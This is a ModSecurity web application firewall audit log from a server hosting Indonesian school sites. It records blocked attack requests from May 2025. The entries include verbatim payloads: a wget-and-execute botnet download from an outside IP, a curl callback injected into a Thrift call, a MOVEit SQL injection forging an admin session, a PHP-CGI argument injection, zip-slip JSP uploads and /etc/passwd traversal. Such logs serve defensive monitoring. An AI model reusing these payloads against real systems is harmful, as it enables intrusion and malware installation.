byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748346149594396 4989 (- - -) Stopwatch2: 1748346149594396 4989; combined=3588, p1=424, p2=3135, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f4f74d-Z-- --46454a77-A-- [27/May/2025:19:45:22 +0700] aDWz4hLFq2VRfSzm6b8goQAAAIk 103.236.140.4 56784 103.236.140.4 8181 --46454a77-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159941940 --46454a77-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0qa44pgpeoi1bmoheageom1awgxkdh41.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --46454a77-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; 
charset=iso-8859-1 --46454a77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748349922409301 3199 (- - -) Stopwatch2: 1748349922409301 3199; combined=1964, p1=440, p2=1456, p3=20, p4=23, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46454a77-Z-- --e7eea556-A-- [27/May/2025:20:57:25 +0700] aDXExWTuEZUBy5rh0saObgAAAAc 103.236.140.4 57296 103.236.140.4 8181 --e7eea556-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.29.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.29.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e7eea556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7eea556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748354245189849 849 (- - -) Stopwatch2: 1748354245189849 849; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7eea556-Z-- --690ac216-A-- [27/May/2025:20:59:28 +0700] aDXFQGTuEZUBy5rh0saOcgAAAAo 103.236.140.4 57304 103.236.140.4 8181 --690ac216-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.135.134.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.135.134.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --690ac216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --690ac216-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748354368803895 2025 (- - -) Stopwatch2: 1748354368803895 2025; combined=1045, p1=335, p2=683, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --690ac216-Z-- --bdffa830-A-- [27/May/2025:21:08:37 +0700] aDXHZRLFq2VRfSzm6b8iEQAAAJI 103.236.140.4 33634 103.236.140.4 8181 --bdffa830-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --bdffa830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdffa830-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748354917421661 883 (- - -) Stopwatch2: 1748354917421661 883; combined=406, p1=372, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdffa830-Z-- --a72b5938-A-- [27/May/2025:21:41:17 +0700] aDXPDRLFq2VRfSzm6b8lGgAAAJA 103.236.140.4 45674 103.236.140.4 8181 --a72b5938-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.236.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.236.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a72b5938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a72b5938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748356877416270 3208 (- - -) Stopwatch2: 1748356877416270 3208; combined=1388, p1=486, p2=872, p3=0, p4=0, p5=30, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a72b5938-Z-- --91a2d10a-A-- [27/May/2025:23:04:16 +0700] aDXigFuSH_Spa4YU2Zm8_gAAAM0 103.236.140.4 46590 103.236.140.4 8181 --91a2d10a-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159946951 --91a2d10a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91a2d10a-E-- --91a2d10a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361856395714 1843 (- - -) Stopwatch2: 1748361856395714 1843; combined=573, p1=411, p2=132, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91a2d10a-Z-- --3d641925-A-- [27/May/2025:23:04:31 +0700] aDXij96cNBpj1JOkpQlk9wAAAEk 103.236.140.4 46596 103.236.140.4 8181 --3d641925-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=81ho8an79e7bu0r4u797pjsoe1 X-Varnish: 159946957 --3d641925-C-- --3d641925-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d641925-E-- --3d641925-H-- Message: Access denied with code 403 (phase 2). 
Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361871432805 3628 (- - -) Stopwatch2: 1748361871432805 3628; combined=1855, p1=512, p2=1313, p3=0, p4=0, p5=29, sr=83, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d641925-Z-- --c433af6d-A-- [27/May/2025:23:04:37 +0700] aDXild6cNBpj1JOkpQlk-QAAAFA 103.236.140.4 46606 103.236.140.4 8181 --c433af6d-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdnTC3Nxx4RVav86ifkRYMLZwI');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE 
SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=81ho8an79e7bu0r4u797pjsoe1 X-Varnish: 168684493 --c433af6d-C-- --c433af6d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c433af6d-E-- --c433af6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361877412937 3772 (- - -) Stopwatch2: 1748361877412937 3772; combined=1760, p1=525, p2=1203, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c433af6d-Z-- --be4dcb53-A-- [27/May/2025:23:25:11 +0700] aDXnZ96cNBpj1JOkpQllBgAAAE4 103.236.140.4 46686 103.236.140.4 8181 --be4dcb53-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Accept-Charset: utf-8 --be4dcb53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be4dcb53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748363111629563 782 (- - -) Stopwatch2: 1748363111629563 782; combined=315, p1=278, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be4dcb53-Z-- --cfec410e-A-- [27/May/2025:23:38:45 +0700] aDXqlVuSH_Spa4YU2Zm-bAAAAMs 103.236.140.4 50238 103.236.140.4 8181 --cfec410e-B-- POST /userentry?accountId=/../../../tomcat/webapps/4IQWb/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159947011 --cfec410e-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --cfec410e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfec410e-E-- --cfec410e-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748363925436456 4135 (- - -) Stopwatch2: 1748363925436456 4135; combined=2475, p1=470, p2=1906, p3=0, p4=0, p5=99, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfec410e-Z-- --511f4433-A-- [27/May/2025:23:47:53 +0700] aDXsuWTuEZUBy5rh0saUUQAAAAI 103.236.140.4 50290 103.236.140.4 8181 --511f4433-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2876.0 Safari/537.36 Accept-Charset: utf-8 --511f4433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --511f4433-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748364473706408 779 (- - -) Stopwatch2: 1748364473706408 779; combined=315, p1=274, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --511f4433-Z-- --dbf9452f-A-- [27/May/2025:23:55:38 +0700] aDXuiluSH_Spa4YU2Zm-nwAAAM4 103.236.140.4 50532 103.236.140.4 8181 --dbf9452f-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159947029 --dbf9452f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dbf9452f-E-- --dbf9452f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748364938866026 2243 (- - -) Stopwatch2: 1748364938866026 2243; combined=607, p1=445, p2=131, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf9452f-Z-- --ec75c014-A-- [28/May/2025:00:03:32 +0700] aDXwZN6cNBpj1JOkpQlnIwAAAEg 103.236.140.4 50576 103.236.140.4 8181 --ec75c014-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --ec75c014-C-- --ec75c014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec75c014-E-- --ec75c014-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365412387968 3511 (- - -) Stopwatch2: 1748365412387968 3511; combined=1941, p1=469, p2=1439, p3=0, p4=0, p5=32, sr=94, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec75c014-Z-- --c9ed6912-A-- [28/May/2025:00:03:53 +0700] aDXwed6cNBpj1JOkpQlnJQAAAFg 103.236.140.4 50580 103.236.140.4 8181 --c9ed6912-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=if0f3gcrssvs5dtsfnsd36gdkp X-Varnish: 159947041 --c9ed6912-C-- --c9ed6912-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 
